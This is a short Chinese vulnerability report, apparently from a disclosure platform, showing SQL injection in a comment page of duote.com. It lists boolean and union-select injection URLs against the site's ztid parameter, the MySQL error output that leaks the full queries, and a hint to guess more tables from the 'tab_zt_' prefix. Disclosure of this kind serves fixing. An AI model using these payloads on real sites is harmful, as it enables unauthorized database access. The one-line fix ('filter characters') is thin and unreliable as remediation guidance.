简要描述：过滤不严导致注入
详细说明：哈哈 站太大 有疏忽的时候
漏洞证明：

http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=1
http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=2

爆SQL语句
1064You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by likes' at line 1 SQL= select count(*) as cnt,likes from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 group by likes 1064You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by vote desc limit 5' at line 1 SQL= select * from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 and vote>0 order by vote desc limit 5 1064You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by addTime desc limit 0,10' at line 1 SQL= select * from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 order by addTime desc limit 0,10

根据爆出来的SQL语句SQL= select * from tab_zt_comment where ztId=-44 union select 1,2,3,4 and published=1 order by addTime desc limit 0,10’ 我们可以进一步渗透，表的结构例如tab_zt_comment 格式tab_zt_ 进一步可以猜表

修复方案：

过滤字符